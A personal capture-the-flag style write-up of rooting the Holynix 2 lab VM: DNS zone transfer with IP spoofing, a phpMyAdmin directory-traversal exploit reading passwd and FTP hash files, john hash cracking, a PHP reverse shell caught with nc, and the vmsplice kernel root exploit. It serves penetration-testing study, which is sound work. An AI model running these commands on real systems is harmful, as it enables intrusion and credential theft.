So busy with my personal but it time to exploit the box at today. This box is second of the Holynix. I have to do many today. OK. Try to exploit the box.
After network scanning VMware is running at ip address 192.168.1.88. So my target is 192.168.1.88
┌─[[email protected]]─[~] └──> netdiscover Currently scanning: 192.168.19.0/16 | Screen View: Unique Hosts 8 Captured ARP Req/Rep packets, from 6 hosts. Total size: 480 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.1.1 60:e3:27:be:75:78 1 60 TP-LINK TECHNOLOGIES CO.,LTD 192.168.1.70 98:fa:e3:48:32:38 1 60 Xiaomi Communications Co Ltd 192.168.1.75 28:e3:47:86:cd:48 1 60 Liteon Technology Corporatio 192.168.1.88 00:0c:29:13:21:b3 2 120 VMware, Inc. 192.168.1.100 34:97:f6:c3:0b:66 2 120 ASUSTek COMPUTER INC. 192.168.1.105 40:a5:ef:dc:a7:62 1 60 Shenzhen Four Seas Global Li
Nmap again!
┌─[[email protected]]─[~] └──> nmap -sV 192.168.1.88 Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-03 12:01 +0630 Nmap scan report for 192.168.1.88 Host is up (0.00083s latency). Not shown: 995 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp Pure-FTPd 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) 53/tcp open domain ISC BIND 9.4.2-P2.1 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch) MAC Address: 00:0C:29:13:21:B3 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
FTP anonymous login not working well. Time to explore port 80 and scan with dirb.
┌─[[email protected]]─[~] └──> dirb http://192.168.1.88 -r ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Jan 3 12:04:58 2018 URL_BASE: http://192.168.1.88/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt OPTION: Not Recursive ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.1.88/ ---- + http://192.168.1.88/index (CODE:200|SIZE:1205) + http://192.168.1.88/index.php (CODE:200|SIZE:1205) + http://192.168.1.88/phpMyAdmin (CODE:403|SIZE:330) + http://192.168.1.88/register (CODE:200|SIZE:16) + http://192.168.1.88/server-status (CODE:403|SIZE:333) ----------------- END_TIME: Wed Jan 3 12:05:01 2018 DOWNLOADED: 4612 - FOUND: 5
I found one form at index.php. I try to login sql query bypass to test vulnerable or not also try other vulnerable method such as File inclusion,xss,rce but fail. I also check the phpMyAdmin but it is forbidden.
Ok now i check the port 53.
http://192.168.1.88:53/
Domain was restricted. I need to dig the IP address with domain name zincftp.com.
┌─[[email protected]]─[~] └──> dig www.zincftp.com @192.168.1.88 ; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4896 ;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;www.zincftp.com. IN A ;; ANSWER SECTION: www.zincftp.com. 38400 IN A 192.168.1.88 ;; AUTHORITY SECTION: zincftp.com. 38400 IN NS ns2.zincftp.com. zincftp.com. 38400 IN NS ns1.zincftp.com. ;; ADDITIONAL SECTION: ns1.zincftp.com. 38400 IN A 192.168.1.88 ns2.zincftp.com. 38400 IN A 192.168.1.89 ;; Query time: 0 msec ;; SERVER: 192.168.1.88#53(192.168.1.88) ;; WHEN: Wed Jan 03 12:16:05 +0630 2018 ;; MSG SIZE rcvd: 128
I try to transfer but fail!.
┌─[[email protected]]─[~] └──> dig www.zincftp.com @192.168.1.88 axfr ; <<>> DiG 9.10.6-Debian <<>> www.zincftp.com @192.168.1.88 axfr ;; global options: +cmd ; Transfer failed.
Ok. now i change my ip address to point.
┌─[[email protected]]─[~] └──> ifconfig eth0 192.168.1.89/24 up ┌─[[email protected]]─[~] └──> ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.1.89 netmask 255.255.255.0 broadcast 192.168.1.255 inet6 fe80::a00:27ff:fee3:4519 prefixlen 64 scopeid 0x20<link> ether 08:00:27:e3:45:19 txqueuelen 1000 (Ethernet) RX packets 193470 bytes 219356737 (209.1 MiB) RX errors 0 dropped 443 overruns 0 frame 0 TX packets 339452 bytes 28046011 (26.7 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Dig again!.
┌─[[email protected]]─[~] └──> dig zincftp.com @192.168.1.88 axfr ; <<>> DiG 9.10.6-Debian <<>> zincftp.com @192.168.1.88 axfr ;; global options: +cmd zincftp.com. 38400 IN SOA ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400 zincftp.com. 38400 IN NS ns1.zincftp.com. zincftp.com. 38400 IN NS ns2.zincftp.com. zincftp.com. 38400 IN MX 10 mta.zincftp.com. zincftp.com. 38400 IN A 192.168.1.88 ahuxley.zincftp.com. 38400 IN A 192.168.1.88 amckinley.zincftp.com. 38400 IN A 192.168.1.88 bzimmerman.zincftp.com. 38400 IN A 192.168.1.88 cbergey.zincftp.com. 38400 IN A 192.168.1.88 cfinnerly.zincftp.com. 38400 IN A 192.168.1.88 cjalong.zincftp.com. 38400 IN A 192.168.1.88 cmahong.zincftp.com. 38400 IN A 192.168.1.88 cmanson.zincftp.com. 38400 IN A 192.168.1.88 ddonnovan.zincftp.com. 38400 IN A 192.168.1.88 ddypsky.zincftp.com. 38400 IN A 192.168.1.88 dev.zincftp.com. 38400 IN A 192.168.1.88 dhammond.zincftp.com. 38400 IN A 192.168.1.88 dmoran.zincftp.com. 38400 IN A 192.168.1.88 dsummers.zincftp.com. 38400 IN A 192.168.1.88 evorhees.zincftp.com. 38400 IN A 192.168.1.88 gwelch.zincftp.com. 38400 IN A 192.168.1.88 hmcknight.zincftp.com. 38400 IN A 192.168.1.88 jgacy.zincftp.com. 38400 IN A 192.168.1.88 jsmith.zincftp.com. 38400 IN A 192.168.1.88 jstreet.zincftp.com. 38400 IN A 192.168.1.88 kmccallum.zincftp.com. 38400 IN A 192.168.1.88 lnickerbacher.zincftp.com. 38400 IN A 192.168.1.88 lsanderson.zincftp.com. 38400 IN A 192.168.1.88 lwestre.zincftp.com. 38400 IN A 192.168.1.88 mta.zincftp.com. 38400 IN A 10.0.192.48 ncobol.zincftp.com. 38400 IN A 192.168.1.88 ns1.zincftp.com. 38400 IN A 192.168.1.88 ns2.zincftp.com. 38400 IN A 192.168.1.89 rcropper.zincftp.com. 38400 IN A 192.168.1.88 rfrost.zincftp.com. 38400 IN A 192.168.1.88 rwoo.zincftp.com. 38400 IN A 192.168.1.88 skrymple.zincftp.com. 38400 IN A 192.168.1.88 splath.zincftp.com. 38400 IN A 192.168.1.88 tmartin.zincftp.com. 38400 IN A 192.168.1.88 trusted.zincftp.com. 38400 IN A 192.168.1.34 www.zincftp.com. 38400 IN A 192.168.1.88 zincftp.com. 38400 IN SOA ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400 ;; Query time: 0 msec ;; SERVER: 192.168.1.88#53(192.168.1.88) ;; WHEN: Wed Jan 03 12:21:05 +0630 2018 ;; XFR size: 42 records (messages 1, bytes 1021)
It work!. Try to access phpMyAdmin but still forbidden. Subdomain also can’t access. :'( . Ok Let’s try to stranger ip in same network. More digging..
┌─[✗]─[[email protected]]─[~] └──> dig zincftp.com @192.168.1.88 axfr | grep -Eiv "192.168.1.88" ;; global options: +cmd zincftp.com. 38400 IN SOA ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400 zincftp.com. 38400 IN NS ns1.zincftp.com. zincftp.com. 38400 IN NS ns2.zincftp.com. zincftp.com. 38400 IN MX 10 mta.zincftp.com. mta.zincftp.com. 38400 IN A 10.0.192.48 ns2.zincftp.com. 38400 IN A 192.168.1.89 trusted.zincftp.com. 38400 IN A 192.168.1.34 zincftp.com. 38400 IN SOA ns1.zincftp.com. ns2.zincftp.com. 2006071801 28800 3600 604800 38400 ;; Query time: 0 msec ;; WHEN: Wed Jan 03 12:25:09 +0630 2018 ;; XFR size: 42 records (messages 1, bytes 1021)
Notice that one subdomain point to 192.168.1.34. Ok try to change the point ip address.
┌─[[email protected]]─[~] └──> ifconfig eth0 192.168.1.34/24 up
Yeah! Now i can access the phpMyAdmin.
Try to outfile with sql query but just found error message.
MySQL said:
#1045 - Access denied for user 'phpadmin'@'localhost' (using password: YES)
Now i check phpMyAdmin version at change_log file.
--------------------- phpMyAdmin - Changelog ---------------------- $Id: ChangeLog,v 2.1238.2.12 2005/09/15 16:44:29 lem9 Exp $ $Source: /cvsroot/phpmyadmin/phpMyAdmin/ChangeLog,v $ 2005-09-15 Marc Delisle <[email protected]> ### 2.6.4-pl1 released
phpMyadmin final version is 2.6.4. Try to search with this version number at exploit-db.
┌─[[email protected]]─[~] └──> searchsploit phpMyAdmin | grep 2.6.4 phpMyAdmin 2.6.4-pl1 - Directory Traversal | exploits/php/webapps/1244.pl
Ok. Time to exploit it.
┌─[[email protected]]─[~] └──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd ATTACK HOST IS: http://192.168.1.88 HTTP/1.1 200 OK Date: Wed, 03 Jan 2018 11:11:51 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Length: 2604 Connection: close Content-Type: text/html root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false bind:x:104:111::/var/cache/bind:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin mysql:x:106:115:MySQL Server,,,:/var/lib/mysql:/bin/false lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash cmahong:x:1005:2002::/home/cmahong:/bin/false lnickerbacher:x:1006:2002::/home/lnickerbacher:/bin/false jstreet:x:1007:2002::/home/jstreet:/bin/false rwoo:x:1008:2002::/home/rwoo:/bin/false kmccallum:x:1009:2002::/home/kmccallum:/bin/false cjalong:x:1010:2002::/home/cjalong:/bin/false jsmith:x:1011:2002::/home/jsmith:/bin/false dhammond:x:1012:2002::/home/dhammond:/bin/false hmcknight:x:1013:2002::/home/hmcknight:/bin/false lwestre:x:1014:2002::/home/lwestre:/bin/false gwelch:x:1015:2002::/home/gwelch:/bin/false dmoran:x:1016:2002::/home/dmoran:/bin/false dsummers:x:1017:2002::/home/dsummers:/bin/false bzimmerman:x:1018:2002::/home/bzimmerman:/bin/false ncobol:x:1019:2002::/home/ncobol:/bin/false ddypsky:x:1020:2002::/home/ddypsky:/bin/false rcropper:x:1021:2002::/home/rcropper:/bin/false cbergey:x:1022:2002::/home/cbergey:/bin/false tmartin:x:1023:2002::/home/tmartin:/bin/false jgacy:x:1024:2002::/home/jgacy:/bin/false splath:x:1025:2002::/home/splath:/bin/false evorhees:x:1026:2002::/home/evorhees:/bin/false rfrost:x:1027:2002::/home/rfrost:/bin/false ahuxley:x:1028:2002::/home/ahuxley:/bin/false webmaster:x:1029:2002::/var/www:/bin/false cmanson:x:1030:2002::/home/cmanson:/bin/false vftp:x:1031:2002:Virtual FTP User:/dev/null:/bin/false
It work. i check there are 5 users can access ssh login.
lsanderson:x:1000:114:Lyle Sanderson:/home/lsanderson:/bin/bash cfinnerly:x:1001:100:Chuck Finnerly:/home/cfinnerly:/bin/bash ddonnovan:x:1002:100:David Donnovan:/home/ddonnovan:/bin/bash skrymple:x:1003:100:Shelly Krymple:/home/skrymple:/bin/bash amckinley:x:1004:100:Agustin Mckinley:/home/amckinley:/bin/bash
I try to crack using hydra with wordlist rockyou.txt . It take time some hours but still fail.. Thinking can save the time, So need to think more..
I notice the full name of each user and try to generate the wordlist to crack this. Extract first all name from /etc/passwd.
lsanderson Lyle Sanderson lylesanderson cfinnerly Chuck Finnerly chuckfinnerly ddonnovan David Donnovan daviddonnovan skrymple Shelly Krymple shellykrymple amckinley Agustin Mckinley agustinmckinley
Combine again with namemash tool.
┌─[[email protected]]─[~/Desktop/tools/namegenerator] └──> ./namemash.py name.txt lsandersonlsanderson lsanderson.lsanderson lsandersonl llsanderson l.lsanderson lsanderson lylesanderson sandersonlyle lyle.sanderson sanderson.lyle sandersonl lsanderson slyle l.sanderson s.lyle lyle [.....] [.....] a.agustinmckinley agustinmckinley
And combine again with 2017 year from 0. I write bash script.
#!/bin/bash
for i in `cat username.txt`
do
for j in {0..2020}
do
echo $i$j
done
done
┌─[[email protected]]─[~/Desktop/tools/namegenerator] └──> ./byear.sh > sshpass.txt ┌─[[email protected]]─[~/Desktop/tools/namegenerator] └──> cat sshpass.txt | head -n 6 agustin0 agustin1 agustin2 agustin3 agustin4 agustin5
It also not lucky but still cracking… Let’s try other method to find.
I need to check the web host config file again!.
┌─[[email protected]]─[~] └──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../var/log/apache2/access.log ATTACK HOST IS: http://192.168.1.88 HTTP/1.1 200 OK Date: Wed, 03 Jan 2018 12:26:46 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Length: 564 Connection: close Content-Type: text/html <br /> <b>Warning</b>: require(./../../../../../var/log/apache2/access.log) [<a href='function.require'>function.require</a>]: failed to open stream: Permission denied in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br /> <br /> <b>Fatal error</b>: require() [<a href='function.require'>function.require</a>]: Failed opening required './../../../../../var/log/apache2/access.log' (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/htdocs/phpMyAdmin/libraries/grab_globals.lib.php</b> on line <b>102</b><br /> ┌─[[email protected]]─[~] └──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/apache2.conf ATTACK HOST IS: http://192.168.1.88 HTTP/1.1 200 OK Date: Wed, 03 Jan 2018 12:27:26 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.12 Connection: close Content-Type: text/html # # Based upon the NCSA server configuration files originally by Rob McCool. # # This is the main Apache server configuration file. It contains the # configuration directives that give the server its instructions. # See http://httpd.apache.org/docs/2.2/ for detailed information about # the directives. # # Do NOT simply read the instructions in here without understanding # what they do. They're here only as hints or reminders. If you are unsure # consult the online docs. You have been warned. # # The configuration directives are grouped into three basic sections: # 1. Directives that control the operation of the Apache server process as a # whole (the 'global environment'). # 2. Directives that define the parameters of the 'main' or 'default' server, # which responds to requests that aren't handled by a virtual host. # These directives also provide default values for the settings # of all virtual hosts. # 3. Settings for virtual hosts, which allow Web requests to be sent to # different IP addresses or hostnames and have them handled by the # same Apache server process. # # Configuration and logfile names: If the filenames you specify for many # of the server's control files begin with "/" (or "drive:/" for Win32), the # server will use that explicit path. If the filenames do *not* begin # with "/", the value of ServerRoot is prepended -- so "/var/log/apache2/foo.log" # with ServerRoot set to "" will be interpreted by the # server as "//var/log/apache2/foo.log". # ### Section 1: Global Environment # # The directives in this section affect the overall operation of Apache, # such as the number of concurrent requests it can handle or where it # can find its configuration files. # # # ServerRoot: The top of the directory tree under which the server's # configuration, error, and log files are kept. # # NOTE! If you intend to place this on an NFS (or otherwise network) # mounted filesystem then please read the LockFile documentation (available # at <URL:http://httpd.apache.org/docs-2.1/mod/mpm_common.html#lockfile>); # you will save yourself a lot of trouble. # # Do NOT add a slash at the end of the directory path. # ServerRoot "/etc/apache2" # # The accept serialization lock file MUST BE STORED ON A LOCAL DISK. # #<IfModule !mpm_winnt.c> #<IfModule !mpm_netware.c> LockFile /var/lock/apache2/accept.lock #</IfModule> #</IfModule> # # PidFile: The file in which the server should record its process # identification number when it starts. # This needs to be set in /etc/apache2/envvars
Now try to read the site config file.
┌─[[email protected]]─[~] └──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../../etc/apache2/sites-enabled/000-default
Yes I found another directory setup_guides.. Check it.
http://www.zincftp.com/setup_guides/todo
Found again another interest file. So try to read again!.
┌─[[email protected]]─[~] └──> perl /usr/share/exploitdb/exploits/php/webapps/1244.pl http://192.168.1.88 /phpMyAdmin/ ../../../../..//etc/pure-ftpd/pureftpd.passwd ATTACK HOST IS: http://192.168.1.88 HTTP/1.1 200 OK Date: Wed, 03 Jan 2018 12:35:06 GMT Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch X-Powered-By: PHP/5.2.4-2ubuntu5.12 Content-Length: 2602 Connection: close Content-Type: text/html cmahong:$1$vUW5q3t0$9RZSkReNoWGCaPtL7ixLX0:1031:2002::/home/cmahong/./:::::::::::: lnickerbacher:$1$yiEZKCE0$BOuvM8nrfoNGWAcjPenpa.:1031:2002::/home/lnickerbacher/./:::::::::::: jstreet:$1$sBGmOuB0$TPHx0jBSFjtJu7dJXb4Nw/:1031:2002::/home/jstreet/./:::::::::::: rwoo:$1$VZxDrE30$p7NPDTkxuQhPSsLpi2a1H1:1031:2002::/home/rwoo/./:::::::::::: cfinnerly:$1$dRGyIOy0$OVGBtLHyxFjPg7tmxtvHY/:1031:2002::/home/cfinnerly/./:::::::::::: kmccallum:$1$dijBzwn0$qlGcbcTT0Qyg8wQf4.QiG1:1031:2002::/home/kmccallum/./:::::::::::: cjalong:$1$FVj4if60$BWSIDiE97oTKUs70qOjZx/:1031:2002::/home/cjalong/./:::::::::::: jsmith:$1$yQKaOpR0$UdySwRtPd1upTckQ5/.CM/:1031:2002::/home/jsmith/./:::::::::::: lsanderson:$1$gzIP52U0$cL6XE61yDZD0unvIIkV8l/:1031:2002::/home/lsanderson/./:::::::::::: dhammond:$1$yK9OuzZ0$W7mgvS4SisxP1BwdLsuy1/:1031:2002::/home/dhammond/./:::::::::::: hmcknight:$1$A07SpdB0$hs/m8KyoJyY3gVAhlWDQI/:1031:2002::/home/hmcknight/./:::::::::::: lwestre:$1$.R5Dbl60$n2ajoJce/LnPVCq497sUQ.:1031:2002::/home/lwestre/./:::::::::::: gwelch:$1$/uYT22Y0$njR3vmLQrbnAugwkNLgJ5/:1031:2002::/home/gwelch/./:::::::::::: dmoran:$1$JZrJXdU0$ORe5.yRgQHCQl6h14rEEe.:1031:2002::/home/dmoran/./:::::::::::: dsummers:$1$VXo3pWp0$v0J7NsxRhDy/ufU01P/ch1:1031:2002::/home/dsummers/./:::::::::::: bzimmerman:$1$rQep6B90$ZtnoFZpTEBkNoRCfqJRpe/:1031:2002::/home/bzimmerman/./:::::::::::: amckinley:$1$45Bz0af0$Fsfo.XXcLkVzSaH5bLjzI0:1031:2002::/home/amckinley/./:::::::::::: ncobol:$1$q.xxgp70$645DFncdOFc24n93la5a70:1031:2002::/home/ncobol/./:::::::::::: ddypsky:$1$ccUhlpJ0$PO/WATKUekwaPct4zXeV9.:1031:2002::/home/ddypsky/./:::::::::::: rcropper:$1$Qhw2Vff0$QDvQMEe9CGFwVrvVUPqTz0:1031:2002::/home/rcropper/./:::::::::::: ddonnovan:$1$1z2APl80$uAyYFZLPu/WRkkpegD3Ht.:1031:2002::/home/ddonnovan/./:::::::::::: cbergey:$1$MOwY3Ie0$LcgARpcVk8Hf8n.E7itC40:1031:2002::/home/cbergey/./:::::::::::: tmartin:$1$3jpH7Yk0$2XmRv6acGEkBjmNQeyzUz.:1031:2002::/home/tmartin/./:::::::::::: jgacy:$1$b.0bYDi0$sSMXaRDSZu8YvWVz.wfCo0:1031:2002::/home/jgacy/./:::::::::::: splath:$1$jbdcsaj0$7uaXto3yRZWwDp5VEbJQV/:1031:2002::/home/splath/./:::::::::::: skrymple:$1$zjyNa1C0$x2JA4Tm61q3N0Fq06gXun1:1031:2002::/home/skrymple/./:::::::::::: evorhees:$1$ITHWZZd0$Qhs38Q7QpRTe./Npk25hu/:1031:2002::/home/evorhees/./:::::::::::: rfrost:$1$3Nqexaj0$eJv5nfOYM71jvlTEA1iv..:1031:2002::/home/rfrost/./:::::::::::: ahuxley:$1$ObpCAT60$LTqCcrqMGAgv8YMyva5Sr0:1031:2002::/home/ahuxley/./:::::::::::: cmanson:$1$gMHNCq70$RCOXC8pfElSRvh5BFc5fF0:1031:2002::/home/cmanson/./:::::::::::: webmaster:$1$v2tdHOX0$MnLOX4cXqZYL99QbDDZ/1/:1031:2002::/var/www/./::::::::::::
Got shadow file and crack with john.
┌─[[email protected]]─[~/Desktop/tools/shadowcracker] └──> ./formatshadow.py raw.txt > shadow ┌─[[email protected]]─[~/Desktop/tools/shadowcracker] └──> john shadow --wordlist='/root/Desktop/rockyou.txt' Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5" Use the "--format=aix-smd5" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 31 password hashes with 31 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3]) Remaining 28 password hashes with 28 different salts Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:11 DONE (2018-01-03 14:07) 0g/s 1371p/s 38413c/s 38413C/s 87thebravery87..8570bravo Session completed ┌─[[email protected]]─[~/Desktop/tools/shadowcracker] └──> john shadow --show cbergey:chatterbox1:521:500:,,,:/home/cbergey:/bin/bash tmartin:millionaire:522:500:,,,:/home/tmartin:/bin/bash ahuxley:bravenewworld:528:500:,,,:/home/ahuxley:/bin/bash 3 password hashes cracked, 28 left
Ater cracking i got 3 passwords but i know that this 3 users don’t have ssh login access. so i try ftp login. Try 3 login but I just found rar file that protect by password of user tmartin.
┌─[[email protected]]─[~/Desktop/Holy] └──> ls -al total 12 drwxr-xr-x 2 root root 4096 Jan 3 14:14 . drwxr-xr-x 5 root root 4096 Jan 3 14:11 .. -rw-r--r-- 1 root root 1004 Jan 3 14:14 mystuff.rar
After thinking few minutes later,I being understand all username are deal with subdomain. Ok. i need to check subdomain again with this ftp user login.
Need to change name server to access sub domain.
┌─[✗]─[[email protected]]─[~/Desktop/Holy] └──> ping cbergey.zincftp.com ping: cbergey.zincftp.com: Name or service not known ┌─[✗]─[[email protected]]─[~/Desktop/Holy] └──> echo nameserver 192.168.1.88 > /etc/resolv.conf ┌─[[email protected]]─[~/Desktop/Holy] └──> ping cbergey.zincftp.com PING cbergey.zincftp.com (192.168.1.88) 56(84) bytes of data. 64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=1 ttl=64 time=0.291 ms 64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=2 ttl=64 time=0.589 ms 64 bytes from www.zincftp.com (192.168.1.88): icmp_seq=3 ttl=64 time=0.620 ms ^C --- cbergey.zincftp.com ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2026ms rtt min/avg/max/mdev = 0.291/0.500/0.620/0.148 ms
Yeah! Access it. Now upload php file to test
┌─[[email protected]]─[~/Desktop/Holy] └──> ftp 192.168.1.88 Connected to 192.168.1.88. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220-You are user number 1 of 5 allowed. 220-Local time is now 04:55. Server port: 21. 220-This is a private system - No anonymous login 220-IPv6 connections are also welcome on this server. 220 You will be disconnected after 15 minutes of inactivity. Name (192.168.1.88:root): cbergey 331 User cbergey OK. Password required Password: 230-User cbergey has group access to: 2002 230 OK. Current directory is / Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 200 PORT command successful 150 Connecting to port 60441 drwxr-xr-x 3 1031 2002 4096 Dec 6 2010 . drwxr-xr-x 3 1031 2002 4096 Dec 6 2010 .. -rw-r--r-- 1 1031 2002 220 Dec 6 2010 .bash_logout -rw-r--r-- 1 1031 2002 2940 Dec 6 2010 .bashrc -rw-r--r-- 1 1031 2002 586 Dec 6 2010 .profile drwxr-xr-x 2 1031 2002 4096 Dec 6 2010 web 226-Options: -a -l 226 6 matches total ftp> cd web 250 OK. Current directory is /web ftp> ls -al 200 PORT command successful 150 Connecting to port 37881 drwxr-xr-x 2 1031 2002 4096 Dec 6 2010 . drwxr-xr-x 3 1031 2002 4096 Dec 6 2010 .. 226-Options: -a -l 226 2 matches total ftp> put info.php local: info.php remote: info.php 200 PORT command successful 150 Connecting to port 34115 226-File successfully transferred 226 0.000 seconds (measured here), 52.51 Kbytes per second 20 bytes sent in 0.00 secs (315.0202 kB/s) ftp> ls -al 200 PORT command successful 150 Connecting to port 54409 drwxr-xr-x 2 1031 2002 4096 Jan 3 12:56 . drwxr-xr-x 3 1031 2002 4096 Dec 6 2010 .. -rw-r--r-- 1 1031 2002 20 Jan 3 12:56 info.php 226-Options: -a -l 226 3 matches total
Now upload again the php reverse shell file.
┌─[[email protected]]─[~/Desktop/Holy] └──> nc -lvp 3333 listening on [any] 3333 ... connect to [192.168.1.89] from www.zincftp.com [192.168.1.88] 48950 Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux 05:00:25 up 2:34, 0 users, load average: 0.07, 0.02, 0.00 USER TTY FROM [email protected] IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: can't access tty; job control turned off $ python -c 'import pty;pty.spawn("/bin/bash")' [email protected]:/$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) [email protected]:/$ uname -a uname -a Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
Yes i check the ssh login home directory and i get one message. Yo yo i got ssh login password for amckinley.
Full name is Agustin Mckinley and add by 2ba9. Therefore password will be agustinmckinley2ba9
Login time for ssh.
┌─[[email protected]]─[~/Desktop/Holy] └──> ssh [email protected] [email protected]'s password: Linux holynix2 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ [email protected]:~$ sudo -l User amckinley may run the following commands on this host: (root) NOPASSWD: /bin/false
Success . Nee to root again!. Kernel version is 2.6.22 2007 old kernel.
Finally i found the right exploit to root. https://www.exploit-db.com/exploits/5092/
[email protected]:/tmp$ wget https://www.exploit-db.com/raw/5092/ -O rootme.c --no-check-certificate --05:25:36-- https://www.exploit-db.com/raw/5092/ => `rootme.c' Resolving www.exploit-db.com... 192.124.249.8 Connecting to www.exploit-db.com|192.124.249.8|:443... connected. WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'. HTTP request sent, awaiting response... 200 OK Length: 6,580 (6.4K) [text/plain] 100%[======================================================================================================>] 6,580 --.--K/s 05:25:38 (677.66 MB/s) - `rootme.c' saved [6580/6580] [email protected]:/tmp$ gcc rootme.c && ./a.out rootme.c:289:28: warning: no newline at end of file ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7d6e000 .. 0xb7da0000 [+] root [email protected]:/tmp# id uid=0(root) gid=0(root) groups=100(users) [email protected]:/tmp#
Bango! I got root access. Thanks for reading. Happy Hacking.